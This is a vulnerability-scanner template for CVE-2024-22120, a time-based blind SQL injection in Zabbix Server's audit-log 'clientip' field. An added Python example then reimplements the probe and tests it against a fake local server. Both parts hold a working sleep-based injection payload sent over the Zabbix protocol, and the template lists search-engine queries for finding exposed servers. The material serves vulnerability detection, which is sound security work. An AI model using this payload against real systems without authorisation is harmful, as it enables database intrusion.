id: CVE-2024-22120

info:
  name: Zabbix Server - Time-Based Blind SQL injection
  author: CodeStuffBreakThings
  severity: critical
  description: |
    The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Because the "clientip" field of that entry is not sanitized, SQL can be injected through "clientip" and exploited as a time-based blind SQL injection. The request is authenticated: it requires a valid session id (sid) of a user permitted to run the script.
  remediation: |
    Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
  reference:
    - https://support.zabbix.com/browse/ZBX-24505#/
    - https://github.com/W01fh4cker/CVE-2024-22120-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22120
    - https://support.zabbix.com/browse/ZBX-24505
    - https://github.com/AboSteam/POPC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-22120
    cwe-id: CWE-20
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    max-request: 1
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
      - http.favicon.hash:"892542951"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2024,authenticated,zabbix,sqli

variables:
  HOST: "{{Host}}"
  PORT: "{{Port}}"
  SID: "{{SID}}"
  HOSTID: "{{HOSTID}}"

code:
  - engine:
      - py
      - python3
    source: |
      import os, struct, socket
      from datetime import datetime

      hostname = os.getenv('HOST')
      port = int(os.getenv('PORT'))
      sid = os.getenv('SID')          # session id of a user allowed to run the script
      hostid = os.getenv('HOSTID')    # host the script is executed against

      # Zabbix protocol frame: "ZBXD" + version byte, 8-byte little-endian body length, JSON body.
      zbx_header = "ZBXD\x01".encode()
      # scriptid 3 is a default global script; clientip is the unsanitized audit-log field.
      message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
      message_length = struct.pack('<Q', len(message_json))
      zbx_payload = zbx_header + message_length + message_json.encode()

      # Time the round trip: a vulnerable server stalls for the injected sleep(10)
      # before the audit entry is written and the reply is sent.
      start = datetime.now()
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      sock.settimeout(30)             # must exceed the injected sleep, or a vulnerable host looks like a timeout
      sock.connect((hostname, port))
      sock.sendall(zbx_payload)
      response = sock.recv(1024)
      sock.close()
      end = datetime.now()

      # Both conditions are required: the delay alone could be network latency,
      # and a ZBXD reply alone only shows the server parsed the frame.
      if (end - start).total_seconds() >= 10 and zbx_header in response:
          print("Vulnerable to CVE-2024-22120")

    matchers:
      - type: word
        words:
          - "Vulnerable to CVE-2024-22120"
# digest: 4a0a00473045022100d6eade8e599069ba5f94de261357dce41150496111312f3c27dd0f4bea5371ef0220244fbe4ba8eca7787fde62c8569d98ee2ddb2aeb614527b154ae892f1f002abc:922c64590222798bb761d5b6d8e72950
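The template above inlines the Zabbix wire format and the timing check in one script. The following is an added example, not part of the template and not Zabbix project code: it separates the protocol framing (build/parse/read a `ZBXD\x01` frame) from the blind-SQLi timing probe, and runs the probe against a constructed in-process stand-in for the server so it can be exercised offline. `FakeZabbixServer`, `probe`, `is_vulnerable`, the sid/hostid values and the server's reply body are all assumptions made for illustration; against a real target you would use `sleep_payload(10)` and a 10-second threshold exactly as the template does.

```python
import json
import socket
import struct
import threading
import time

ZBX_HEADER = b"ZBXD\x01"   # protocol magic plus version byte
ZBX_LEN_FMT = "<Q"         # 8-byte little-endian body length (4-byte length + 4 reserved bytes on the wire)


def build_frame(payload: dict) -> bytes:
    """Wrap a JSON object in a Zabbix protocol frame: header, length, body."""
    body = json.dumps(payload).encode()
    return ZBX_HEADER + struct.pack(ZBX_LEN_FMT, len(body)) + body


def parse_frame(data: bytes) -> dict:
    """Inverse of build_frame; rejects anything that is not a complete ZBXD frame."""
    if not data.startswith(ZBX_HEADER) or len(data) < 13:
        raise ValueError("not a Zabbix protocol frame")
    (length,) = struct.unpack(ZBX_LEN_FMT, data[5:13])
    body = data[13:13 + length]
    if len(body) != length:
        raise ValueError("truncated frame")
    return json.loads(body)


def recv_frame(sock: socket.socket) -> bytes:
    """Read the 13-byte header first, then exactly the advertised body length."""
    head = b""
    while len(head) < 13:
        chunk = sock.recv(13 - len(head))
        if not chunk:
            raise ConnectionError("peer closed before header")
        head += chunk
    if not head.startswith(ZBX_HEADER):
        raise ValueError("not a Zabbix protocol frame")
    (length,) = struct.unpack(ZBX_LEN_FMT, head[5:13])
    body = b""
    while len(body) < length:
        chunk = sock.recv(length - len(body))
        if not chunk:
            raise ConnectionError("peer closed mid-body")
        body += chunk
    return head + body


def command_request(sid: str, hostid: str, clientip: str, scriptid: str = "3") -> dict:
    """The 'command' request the template sends; clientip is the unsanitized audit-log field."""
    return {"request": "command", "sid": sid, "scriptid": scriptid,
            "clientip": clientip, "hostid": hostid}


def sleep_payload(seconds: int) -> str:
    """Time-based blind SQLi string for clientip (same shape as the template's payload)."""
    return "' + (select sleep(%d)) + '" % seconds


class FakeZabbixServer:
    """Constructed stand-in for a Zabbix server (assumption; not real Zabbix code).
    When 'vulnerable' it stalls for 'delay' seconds if the injected sleep is present,
    mimicking the database executing sleep() while writing the audit entry."""

    def __init__(self, vulnerable: bool, delay: float):
        self.vulnerable, self.delay = vulnerable, delay
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve_one, daemon=True).start()

    def _serve_one(self):
        conn, _ = self.sock.accept()
        with conn:
            req = parse_frame(recv_frame(conn))
            if self.vulnerable and "sleep(" in req.get("clientip", ""):
                time.sleep(self.delay)
            # Constructed reply body; the check only cares that a ZBXD frame came back.
            conn.sendall(build_frame({"response": "failed", "info": "constructed reply"}))
        self.sock.close()


def probe(host: str, port: int, sid: str, hostid: str, sleep_seconds: int, timeout: float = 30.0):
    """Send the injected command request and time the round trip. Returns (elapsed, reply)."""
    frame = build_frame(command_request(sid, hostid, sleep_payload(sleep_seconds)))
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as sock:  # timeout must exceed the sleep
        sock.sendall(frame)
        raw = recv_frame(sock)
    return time.monotonic() - start, parse_frame(raw)


def is_vulnerable(elapsed: float, reply: dict, threshold: float) -> bool:
    """Template logic: a well-formed ZBXD reply arrived AND the round trip absorbed the injected sleep."""
    return reply is not None and elapsed >= threshold


if __name__ == "__main__":
    srv = FakeZabbixServer(vulnerable=True, delay=1.0)   # short delay for the local demo
    elapsed, reply = probe("127.0.0.1", srv.port, "0123456789abcdef", "10084", sleep_seconds=1)
    print("elapsed %.2fs, vulnerable=%s" % (elapsed, is_vulnerable(elapsed, reply, 0.8)))
```

`recv_frame` reads the body length from the header instead of a single `recv(1024)`, so a reply larger than one segment does not break the check, and the socket timeout is set above the injected sleep so that a vulnerable host is not misreported as a timeout.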